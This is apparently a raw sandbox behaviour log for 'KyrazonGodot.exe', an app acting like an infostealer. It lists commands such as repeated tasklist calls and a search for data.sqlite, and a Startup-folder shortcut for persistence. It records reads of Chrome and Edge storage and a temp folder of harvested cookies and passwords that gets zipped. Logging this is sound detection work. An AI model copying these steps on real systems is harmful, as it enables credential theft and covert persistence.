Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\where.exe where /r . data.sqlite
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1640 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2304 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\where.exe where /r . data.sqlite
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "c:\users\user\appdata\local\programs\kyrazongodot\kyrazongodot.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\kyrazongodot" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1748 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe c:\users\user\appdata\local\programs\kyrazongodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\shortcut.exe /a:c "/f:c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\kyrazongodot.lnk" /t:c:\users\user\appdata\local\programs\kyrazongodot\kyrazongodot.exe
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "c:\users\user\appdata\local\programs\kyrazongodot\kyrazongodot.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\kyrazongodot" --mojo-platform-channel-handle=2364 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "c:\users\user\appdata\local\programs\kyrazongodot\kyrazongodot.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\kyrazongodot" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1640 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "c:\users\user\appdata\local\programs\kyrazongodot\kyrazongodot.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\kyrazongodot" --mojo-platform-channel-handle=2304 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "c:\users\user\appdata\local\programs\kyrazongodot\kyrazongodot.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\kyrazongodot" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1748 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe c:\users\user\appdata\local\programs\kyrazongodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\shortcut.exe /a:c "/f:c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\kyrazongodot.lnk" /t:c:\users\user\appdata\local\programs\kyrazongodot\kyrazongodot.exeJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "c:\users\user\appdata\local\programs\kyrazongodot\kyrazongodot.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\kyrazongodot" --mojo-platform-channel-handle=2364 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "c:\users\user\appdata\local\programs\kyrazongodot\kyrazongodot.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\kyrazongodot" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1640 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "c:\users\user\appdata\local\programs\kyrazongodot\kyrazongodot.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\kyrazongodot" --mojo-platform-channel-handle=2304 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Programs\KyrazonGodot VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\package.json VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\windows-shortcuts.js VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\CURQNKVOIX.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\DTBZGIOOSO.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\DVWHKMNFNN.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\DVWHKMNFNN.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\NIKHQAIQAU.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\ONBQCLYSPU.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\ONBQCLYSPU.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\RAYHIWGKDI.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\VLZDGUKUTZ.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\HTAGVDFUIE VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\IPKGELNTQY VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\JSDNGYCOWY VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\KATAXZVCPS.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\LTKMYBSEYZ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Music VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\ONBQCLYSPU VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\ONBQCLYSPU.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\RAYHIWGKDI.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Desktop\YPSIACHYXW.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Desktop\YPSIACHYXW.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Applications VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Cookies\Google_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Applications VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Cookies\Google_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Cookies VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Passwords\Google_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip VolumeInformationJump to behavior
